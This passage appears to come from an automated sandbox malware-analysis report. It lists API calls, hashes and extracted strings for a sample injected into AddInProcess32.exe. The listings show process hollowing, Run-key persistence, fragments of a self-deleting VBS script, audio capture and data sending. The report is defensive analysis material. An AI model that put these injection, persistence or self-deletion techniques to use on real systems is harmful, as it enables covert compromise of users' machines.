                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                      • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                      • ResumeThread.KERNEL32(?), ref: 00418470
                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                      • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                      • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                      • GetLastError.KERNEL32 ref: 004184B5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                      • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                      • API String ID: 4188446516-3035715614
                                                      • Opcode ID: 270f6f13d6fde63ba60b02dc59acd4711bf4d0802e0e8c14fb5fe4b704ceb149
                                                      • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                      • Opcode Fuzzy Hash: 270f6f13d6fde63ba60b02dc59acd4711bf4d0802e0e8c14fb5fe4b704ceb149
                                                      • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                                      APIs
                                                        • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                        • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                        • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                                        • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                        • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                                        • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                      • ExitProcess.KERNEL32 ref: 0040D80B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                      • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                      • API String ID: 1861856835-1447701601
                                                      • Opcode ID: 794eba10b69094c6990f25edb43bc5f181c5c90267341265794d1b1851e37820
                                                      • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                      • Opcode Fuzzy Hash: 794eba10b69094c6990f25edb43bc5f181c5c90267341265794d1b1851e37820
                                                      • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                      APIs
                                                        • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                        • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                        • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                                        • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                        • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                                        • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                      • ExitProcess.KERNEL32 ref: 0040D454
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                      • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                      • API String ID: 3797177996-2483056239
                                                      • Opcode ID: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
                                                      • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                      • Opcode Fuzzy Hash: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
                                                      • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                      APIs
                                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                      • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                      • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                      • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                      • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                      • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                      • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                        • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                      • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                      • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                      • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                      • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                      • API String ID: 2649220323-436679193
                                                      • Opcode ID: ad55fade47a44d5a96cc11b86df2472168e9c7caf5a37438c9269d8872241baf
                                                      • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                      • Opcode Fuzzy Hash: ad55fade47a44d5a96cc11b86df2472168e9c7caf5a37438c9269d8872241baf
                                                      • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                      APIs
                                                      • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                      • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
                                                      • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                      • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                      • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                      • SetEvent.KERNEL32 ref: 0041B2AA
                                                      • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                      • CloseHandle.KERNEL32 ref: 0041B2CB
                                                      • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                      • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                      • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                      • API String ID: 738084811-2094122233
                                                      • Opcode ID: d561e535e20e94d4d32498695f90d41e23c390ecef7d03d0c81b33d87c062984
                                                      • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                      • Opcode Fuzzy Hash: d561e535e20e94d4d32498695f90d41e23c390ecef7d03d0c81b33d87c062984
                                                      • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                      • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                      • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                      • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                      • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                      • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                      • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                      • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                      • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                      • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Write$Create
                                                      • String ID: RIFF$WAVE$data$fmt
                                                      • API String ID: 1602526932-4212202414
                                                      • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                      • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                      • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                      • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                      • API String ID: 1646373207-4283035339
                                                      • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                      • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                      • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                      • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 0040CE42
                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                      • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                                      • _wcslen.LIBCMT ref: 0040CF21
                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                      • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000), ref: 0040CFBF
                                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                      • _wcslen.LIBCMT ref: 0040D001
                                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                      • ExitProcess.KERNEL32 ref: 0040D09D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                      • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$del$open
                                                      • API String ID: 1579085052-1506045317
                                                      • Opcode ID: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
                                                      • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                      • Opcode Fuzzy Hash: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
                                                      • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                      APIs
                                                      • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                      • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                      • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                      • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                      • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                      • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                      • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                      • _wcslen.LIBCMT ref: 0041C1CC
                                                      • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                      • GetLastError.KERNEL32 ref: 0041C204
                                                      • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                      • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                      • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                      • GetLastError.KERNEL32 ref: 0041C261
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                      • String ID: ?
                                                      • API String ID: 3941738427-1684325040
                                                      • Opcode ID: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                      • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                      • Opcode Fuzzy Hash: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                      • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                      APIs
                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                      • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                      • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                      • String ID: EIA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                      • API String ID: 2490988753-3346362794
                                                      • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                      • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                      • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                      • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$EnvironmentVariable$_wcschr
                                                      • String ID:
                                                      • API String ID: 3899193279-0
                                                      • Opcode ID: 8496763b0818b5098030034dcc69127a0bf1f152158b2efe3c03734e132739af
                                                      • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                      • Opcode Fuzzy Hash: 8496763b0818b5098030034dcc69127a0bf1f152158b2efe3c03734e132739af
                                                      • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                        • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                        • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                        • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                      • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                      • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                      • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                      • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                      • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                      • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                      • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                      • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                      • String ID: /stext "$0TG$0TG$NG$NG
                                                      • API String ID: 1223786279-2576077980
                                                      • Opcode ID: 8b5758fc960045b70db6b1621d1f1f5248a15739f774e2f35fdd395e03aad00d
                                                      • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                      • Opcode Fuzzy Hash: 8b5758fc960045b70db6b1621d1f1f5248a15739f774e2f35fdd395e03aad00d
                                                      • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
                                                      • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseEnumOpen
                                                      • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                      • API String ID: 1332880857-3714951968
                                                      • Opcode ID: f13192da4e66231cc3a913cdaba6528dc2f099d68fe13da123ac92ab36a9ee38
                                                      • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                      • Opcode Fuzzy Hash: f13192da4e66231cc3a913cdaba6528dc2f099d68fe13da123ac92ab36a9ee38
                                                      • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                      APIs
                                                      • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                      • GetCursorPos.USER32(?), ref: 0041D67A
                                                      • SetForegroundWindow.USER32(?), ref: 0041D683
                                                      • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                      • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                      • ExitProcess.KERNEL32 ref: 0041D6F6
                                                      • CreatePopupMenu.USER32 ref: 0041D6FC
                                                      • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                      • String ID: Close
                                                      • API String ID: 1657328048-3535843008
                                                      • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                      • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                      • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                      • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$Info
                                                      • String ID:
                                                      • API String ID: 2509303402-0
                                                      • Opcode ID: 75151fbced3465edae0101cd141662f582d879f03032417287744dbc83fd132d
                                                      • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                      • Opcode Fuzzy Hash: 75151fbced3465edae0101cd141662f582d879f03032417287744dbc83fd132d
                                                      • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                      • __aulldiv.LIBCMT ref: 00408D88
